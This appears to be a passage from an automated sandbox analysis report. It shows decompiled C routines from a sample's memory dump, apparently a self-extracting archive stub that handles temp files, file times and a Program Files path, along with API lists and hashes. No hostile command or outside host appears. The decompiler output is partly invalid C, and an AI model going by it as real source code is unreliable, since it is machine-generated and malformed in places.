          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend$Item$TextWindow$Dialog
          • String ID: LICENSEDLG
          • API String ID: 3214253823-2177901306
          • Opcode ID: 3768731107244a203aa5dddf7cfacf9e7e2afea6840c9acdd08aecbe52bc5982
          • Instruction ID: dfc2a69b91a5515fddf0801bd8e20ebe4ec3e542db0706310773eecef7e9dad7
          • Opcode Fuzzy Hash: 3768731107244a203aa5dddf7cfacf9e7e2afea6840c9acdd08aecbe52bc5982
          • Instruction Fuzzy Hash: 6E21B1362243157BE3215F65FD8DF7B7B6CEB56B84F404004F601A54E2CB96A8229636
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
          Download Yara Rule
          C-Code - Quality: 80%
          			E001F9268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E0020D870(E00221336, _t85);
				E0020D940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E001FB943(_t92, _t85 - 0x4030);
							_t78 = E001FB943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00201410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00201410(E001FB943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E001FFAB1(_t85 - 0x100c, _t83, 0x800);
											E001F3E41(E001FB943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E001F9E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E001FFAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E001FB9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E001F943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E001F9E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E001F9528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E001F94DA(_t85 - 0x2030);
												E001F9621(_t85 - 0x2030);
											}
											E001F946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}
















          0x001f926d
          0x001f9277
          0x001f927e
          0x001f9281
          0x001f9290
          0x001f9298
          0x001f9427
          0x001f9427
          0x001f9427
          0x001f92a6
          0x001f92af
          0x001f92b7
          0x00000000
          0x001f92bd
          0x001f92bd
          0x001f92bf
          0x00000000
          0x001f92c5
          0x001f92d1
          0x001f92e0
          0x001f92e2
          0x001f92e7
          0x00000000
          0x001f92ed
          0x001f92f1
          0x001f92f6
          0x001f92f8
          0x00000000
          0x001f92fe
          0x001f9306
          0x001f930d
          0x00000000
          0x001f9313
          0x001f9313
          0x001f931a
          0x001f931c
          0x001f931c
          0x001f931f
          0x00000000
          0x00000000
          0x001f932e
          0x001f934b
          0x001f9350
          0x001f9361
          0x001f936e
          0x001f9363
          0x001f9363
          0x001f9365
          0x001f9365
          0x001f9375
          0x001f937e
          0x00000000
          0x001f9380
          0x001f9380
          0x001f9383
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001f9383
          0x00000000
          0x001f937e
          0x001f9397
          0x001f939c
          0x001f93a7
          0x001f93c4
          0x00000000
          0x001f93c6
          0x001f93cc
          0x001f93d2
          0x001f93dc
          0x001f93de
          0x001f93e0
          0x001f93ec
          0x001f93ec
          0x001f93fc
          0x001f9400
          0x001f9408
          0x001f9413
          0x001f9413
          0x001f941e
          0x001f9423
          0x001f9423
          0x001f93c4
          0x001f930d
          0x001f92f8
          0x001f92e7
          0x001f92bf
          0x001f92b7
          0x001f9429
          0x001f942f
          0x001f9439

          APIs
          • __EH_prolog.LIBCMT ref: 001F926D
          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001F9290
          • GetShortPathNameW.KERNEL32 ref: 001F92AF
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • _swprintf.LIBCMT ref: 001F934B
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • MoveFileW.KERNEL32(?,?), ref: 001F93C0
          • MoveFileW.KERNEL32(?,?), ref: 001F93FC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
          • String ID: rtmp%d
          • API String ID: 2111052971-3303766350
          • Opcode ID: a28bfbecb338200ea0a272b9df200bb7284586a4f3d35385440ccff8ec1d3ae6
          • Instruction ID: f3e45b2dc3e41b9d4d3ea62b7c966f2934af0551c4d7a577e49c0ee69565d6d4
          • Opcode Fuzzy Hash: a28bfbecb338200ea0a272b9df200bb7284586a4f3d35385440ccff8ec1d3ae6
          • Instruction Fuzzy Hash: E5415BB691521CA6DF21FBA0CE44FFA637CBF65381F0444E5A704A3042EB349B85CBA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002006E0, Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E002006E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0020DEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E001FA995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0x22d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00200849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E0020DF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}




















          0x002006e0
          0x002006e7
          0x002006f8
          0x002006fc
          0x00200710
          0x0020072e
          0x0020073b
          0x00200751
          0x0020075d
          0x0020076b
          0x00200773
          0x00200779
          0x0020077f
          0x00200783
          0x00200785
          0x00200712
          0x0020071c
          0x0020071c
          0x00200793
          0x00200795
          0x002007a0
          0x002007a1
          0x002007a6
          0x002007ab
          0x002007b0
          0x002007b8
          0x002007c0
          0x002007c8
          0x002007ce
          0x002007d0
          0x002007d3
          0x002007d6
          0x002007db
          0x002007df
          0x002007e4
          0x002007e5
          0x002007ec
          0x002007ef
          0x002007f2
          0x002007f5
          0x002007f8
          0x00000000
          0x00000000
          0x00000000
          0x002007f8
          0x002007fa
          0x002007fa
          0x00200802
          0x0020080e
          0x0020080e
          0x0020081d
          0x00200823
          0x0020082c

          APIs
          • __aulldiv.LIBCMT ref: 002006F3
            • Part of subcall function 001FA995: GetVersionExW.KERNEL32(?), ref: 001FA9BA
          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0020071C
          • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0020072E
          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0020073B
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00200751
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0020075D
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00200793
          • __aullrem.LIBCMT ref: 0020081D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
          • String ID:
          • API String ID: 1247370737-0
          • Opcode ID: 6aef271e28ae6e57be94c7e9666ad359d0bfa95cfc3627b544970d59a8f192fd
          • Instruction ID: ba3b9a49bbda5524f25124e545459427c45f44ab0d0f4df6aae9f38809f932ac
          • Opcode Fuzzy Hash: 6aef271e28ae6e57be94c7e9666ad359d0bfa95cfc3627b544970d59a8f192fd
          • Instruction Fuzzy Hash: A5414EB1408305AFD310DFA5C884A6BF7F8FF88704F00492EF69692651E779E558CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020BB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
          Download Yara Rule
          C-Code - Quality: 52%
          			E0020BB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E001FAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0x22d5f8);
						__ebp - 0x7c84 = E001F3E41(0x2385fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E001F9E6B(0x2385fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x2385fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E0020A156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00201410(_t285 - 0xfc8c,  *((intOrPtr*)(0x22d618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M0020C0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E002095F8(_t285 - 0x7c84, 0x800);
									E001FA188(E001FB625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E001FA2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E001F6EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E001FA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E001FA19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E001FB1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E001FAEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00212B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E001FB5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00212B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E0020E920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0x22def4();
											goto L18;
										}
										L15:
										_t262 = E00212B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E001FA215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E001F3E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0x24ce0c;
										__eflags =  *0x24ce0c;
										__ebx = __ebx & 0xffffff00 |  *0x24ce0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0x24ce0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E0020A2AE(__ecx, __edx, __eflags);
											__eax =  *0x24ce0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E00212B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x24ce0c);
										__eax = E00212B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0x24ce0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E002166ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00212B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0x239602 - __di;
									if( *0x239602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00212B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00210D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0x239602;
												E001FFAB1(0x239602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00209FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0x22df7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x239602); // executed
												__eax = __ebp - 0x103c;
												__eax = E00212B69(__ebp - 0x103c, 0x239602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x22dea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0x22dea4();
													_push( *(__ebp - 0x18));
													 *0x22de84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00212B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00212B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E001FFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0x2395fc - 1;
									__eflags = __eax - 0x2395fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0x2375d2 = __cl;
										 *0x2375d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x2375d2 = __cl;
										L81:
										 *0x2375d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0x2375d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E00212B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E0021668C(__ebx, __edi);
											_pop(__ecx);
											 *0x24de1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x24de18 = E0020A2AE(__ecx, __edx, __eflags);
									}
									 *0x245d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0x24de20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E0020C431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E002159C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x24ad0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E001FFAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0x249d0a);
											_push(__eax);
											__eax = E001FFAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x24bd0a);
											_push(__eax);
											__eax = E001FFAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E001F9E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E00214D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00214D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00210BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
